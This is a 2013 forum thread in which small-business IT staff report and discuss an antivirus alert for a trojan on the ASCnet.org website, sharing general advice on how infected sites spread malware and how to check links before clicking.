Warning! The ASCnet site maybe infected with a Virus.

Started by Ben Thoele, February 18, 2013, 11:32:32 AM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Ben Thoele

Sophos AV kicks out the following warning when I visit the ASCnet site.

   Virus/spyware 'Troj/Iframe-JG' has been detected at "www.ascnet.org/AM/HierMenu/HM_ScriptDOM.js"
     
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Ben Thoele

Sophos Labs confirmed that the ASCnet.org is infected with Troj/Iframe-JG.

Aaron over at ASCnet is working with their web hosting provider to get it resolved.  He said he would email me when it's fixed.   I will follow-up when I hear from him.
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Charlie Charbonneau

Yikes!   Is that the free stoof you get with membership?!
Charlie Charbonneau
GBMB Insurance
San Antonio TX.

EPIC 2022, CSR24, Windows 2012 Hyper-V & 2016, Win10/11 Pro Stations, Sophos Anti-Virus.
.                .                 ..              ...

DebAmstutz

Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.
Deb Amstutz
Missing TAM 5 days a week

Jim Jensen

Deb, lots of websites have malicious software that have become imbedded in them. A lot of sites run small programs (scripts) in order to make them look nice or have certain functionalities. Some use Java, while others use Flash. These scripts run on your computer. This is why you've seen the warnings about issues with Java and that you need to either disable it, or apply a patch (when they are available). If someone infiltrates and website and leaves behind malicious coding, it can run on yours just by going to the website. Email is only one way to obtain a nasty on your computer.
Jim Jensen
CIC, CEO, CIO, COO, CFO, Producer, CSR, Claims Handler, janitor....whatever else.
Jensen Ford Insurance
Indianapolis

Ben Thoele

#5
Quote from: DebAmstutz on February 18, 2013, 12:37:26 PM
Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.

Here is a great You Tube Video I showed our staff to help understand this.
http://www.youtube.com/watch?v=EK6BBYmiVpo&feature=share&list=PL4E9816850A80ED8E

I wouldn't visit ASCnet, for now, unless you are prepared to reload your computer.  And that's the rule of thumb I use for all internet browsing at work.  Is the site "work related" and or, am I willing to deal with the repercussions.  Since there is no 100% safe web surfing I advise users to browse based on a cost/benefit analysis.   Is the site I'm going to worth the potential risk to my work computer.  If a user is infected from a vacation site, then they are in trouble.  If they get a virus from Travelers.com then they are O.K. because that's a cost of doing business.    Hopefully you're not paying to rebuild computers so your employees can plan their vacations at work.


Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Marie (Zionkowski) Gozikowski

Ben - what a great link... thanks for posting it!  I am going to have my users watch them all :-)
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Lynne Desrochers

Lynne Desrochers

Ben Thoele

Quote from: Lynne Desrochers on February 18, 2013, 01:17:07 PM
Hey, how do we know that link is safe?  : )
Good Question.  I look at the domain,  in this case It's www.youtube.com which I trust.  If I receive an Insurance Marketing email and the link points to www.hellspawn.com I don't click on it.  If you can't see the link you can "mouse over" or hover over the link to see where it points.  This way you to inspect the link before you click on it.  An email from Travelers.com should include links to www.Travelers.com/whatever not to  www.russianmalwarehost.com/virus or whatever.

Does that help? 
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Marie (Zionkowski) Gozikowski

I have Youtube blocked at work, but it looks like you can also view these videos directly from Sophos' site:

http://www.sophos.com/en-us/security-news-trends/anatomy-of-an-attack.aspx
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Ben Thoele

Looks like the Ascnet site is fixed for now.  At least they made a change and when I go there it's doesn't set off our AV. 

Surf at your own risk!
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Bloody Jack Kidd

It can happen to many sites, although often enough the malicious content is actually served from a site other than the one you are visiting. In this case it could be a few things, like Sophos getting a bit too paranoid, in which case the javascript in question may not be as dangerous as this makes it appear.

Another possibility is that the site has been compromised and malicious code has been planted there.

I would point a finger a snicker, but this can and does happen to even the most well-run and secure sites. In fact, recently Bit9 a company on the bleeding edge of application white listing got hacked and delivery malware out to their own clients.
Sysadmin - Parallel42

Gene Foraker

I don't know how the message board get a virus, but don't forget that there is a "files" area where you can download files.   There may have been something there.
Gene Foraker CPCU
Gates-Foraker Insurance Agency
Norton, OH


My posts are a natural hand made product. The slight variations in spelling and grammar enhance its individual character and beauty and in no way are to be considered flaws or defects.

Mark

Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Quote from: Mark on February 19, 2013, 11:00:53 AM
Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.

browser / platform id is a very common javascript trick - nothing malicious about that in and of itself - but malicious sites looking to exploit a system will often first determine what you are running and then deliver the appropriate payload.
Sysadmin - Parallel42

Mark

Right.  I just wgot it a few minutes ago and looked at it just to see what it was.  I assume it's been cleaned/replaced already.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Sysadmin - Parallel42

Bob

I noticed last week same thing.  AV stopped it cold but popped up visiting community.    Ironic I just mentioned this possibility but java not java script and if board could infect members.    ???

Bloody Jack Kidd

I am curious if it really was bad js and if so, how did it get there. It opens up some pretty scary scenarios.
Sysadmin - Parallel42

Mark

Quote from: Bloody Jack Kidd on February 19, 2013, 02:00:58 PM
I am curious if it really was bad js and if so, how did it get there. It opens up some pretty scary scenarios.

Right.  Was the server compromised and that script edited to obtain malware from somewhere, or what happened?

I know that ASCnet.org uses ColdFusion and there have been exploits for that in the past.  Not familiar with ColdFusion so idk how to tell if it's up to date or not.  Also, the Community and the website are not hosted at the same location.  Socious hosts out of Kansas City and ascnet.org looks to be in Washington DC.

So, www.ascnet.org running ColdFusion does not directly affect community.ascnet.org running Socious.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

ah, so it was the coldfusion site?

that would not be surprising then - I had looked at that in the past and thought to myself - "oh boy, it's just a matter of time..."
Sysadmin - Parallel42

Mark

Quote from: Bloody Jack Kidd on February 19, 2013, 03:07:32 PM
that would not be surprising then - I had looked at that in the past and thought to myself - "oh boy, it's just a matter of time..."

HAHAHAHA.  Yep.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

DebAmstutz

So it's safe to go to ascnet.org now? 

Also, I received email yesterday from one of the ascnet employees regarding an upcoming chapter meeting.  I have not opened it, having read the warning here first.  Do you think I should ask for the email to be resent or would email from ascnet.org yesterday before the problem was fixed be ok to open?  I know there are attachments but they would be pdf's as they are handouts.
Deb Amstutz
Missing TAM 5 days a week

Mark

I wouldn't expect the email to be infected if it were me..
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bob

Appears to be ok now.  I'm not getting any alerts like I did last Friday.

DebAmstutz

I'm getting a "This website has experienced an unexpected error" message just now when I tried to go there.  Perhaps there is a bigger problem?
Deb Amstutz
Missing TAM 5 days a week

Bloody Jack Kidd

not looking good...

...and the error is leaking info you don't want to be leaked, like file structure and user accounts.
Sysadmin - Parallel42

Mark

Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Ric

guess it was a good day to be off Monday and have been playing catch up ever since.  Still have not gotten caught up.  is the ASCnet site clean yet?
Ric Tucker
Manager of Information Systems
Past President, New Jersey Chapter

J A Mariano Agency
TAM 2020, 11users, Windows 2019 Server,
Windows 10 Pro 64-bit workstations
fax@vantage 9.0.5,
Acoustic guitar, drums, percussion
Chrome, Microsoft 365

Bloody Jack Kidd

Can't tell if it's clean, apparently it is broken to some degree.
Sysadmin - Parallel42

Mark

ASCnet site is down.  Aaron says it's "Managed Web" so he has no access.  I'm guessing that means all he can do is submit a ticket and wait?  I hate not having full control over my stuff.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Ric

Ric Tucker
Manager of Information Systems
Past President, New Jersey Chapter

J A Mariano Agency
TAM 2020, 11users, Windows 2019 Server,
Windows 10 Pro 64-bit workstations
fax@vantage 9.0.5,
Acoustic guitar, drums, percussion
Chrome, Microsoft 365

Bloody Jack Kidd

Maybe now is a good time to offer them a deal on hosting.

:-\
Sysadmin - Parallel42

Mark

Quote from: Bloody Jack Kidd on February 20, 2013, 09:21:52 AM
Maybe now is a good time to offer them a deal on hosting.

:-\

Maybe, but I don't know that I'd want to host a ColdFusion site...
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Quote from: Mark on February 20, 2013, 09:25:02 AM
Maybe, but I don't know that I'd want to host a ColdFusion site...

I could put it in a jail...
Sysadmin - Parallel42

Mark

Website is back, but this is what I'm getting:

Scan type: Auto-Protect Scan
Event: Risk Found!
Security risk detected: IFrame.Exploit
File: C:\Documents and Settings\...\Local Settings\Application Data\Mozilla\Firefox\Profiles\ivo2rvzr.default\Cache\8\0C\D7AE9d01
Location: C:\Documents and Settings\...\Local Settings\Application Data\Mozilla\Firefox\Profiles\ivo2rvzr.default\Cache\8\0C
Computer: ...
User: ...
Action taken: Pending Side Effects Analysis : Access denied
Date found: Wednesday, February 20, 2013  8:40:46 AM
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Jim Jensen

See - I told you they'd fall apart without me when I let my membership lapse... ;D
Jim Jensen
CIC, CEO, CIO, COO, CFO, Producer, CSR, Claims Handler, janitor....whatever else.
Jensen Ford Insurance
Indianapolis

Mark

Aaron is aware of the iFrame exploit, as we would all expect him to be, and he is on it.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Mark

Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security